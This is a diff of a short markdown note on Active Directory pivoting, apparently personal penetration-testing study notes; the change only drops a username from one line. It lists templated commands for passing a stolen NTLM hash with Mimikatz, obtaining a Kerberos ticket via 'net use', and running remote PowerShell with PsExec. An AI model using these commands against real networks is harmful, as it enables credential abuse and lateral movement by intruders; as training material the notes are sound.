KhaelK138/KhaelK138.github.io/markdown/ADPivoting.md

 - This can act as `RunAs` but for a domain user's hash
 - Performed using Mimikatz
 	- `sekurlsa::pth /user:{domain_user} /domain:{domain} /ntlm:{compromised_hash} /run:powershell`
-- To get a Kerberos ticket, we run something in the new powershell window as jen
+- To get a Kerberos ticket, we run something in the new powershell window
 	- `net use \\files04`
 - Once we have the ticket, we can just use PsExec to run commands on the remote systems using the compromised user
 	- `PsExec.exe \\{dnshostname} powershell`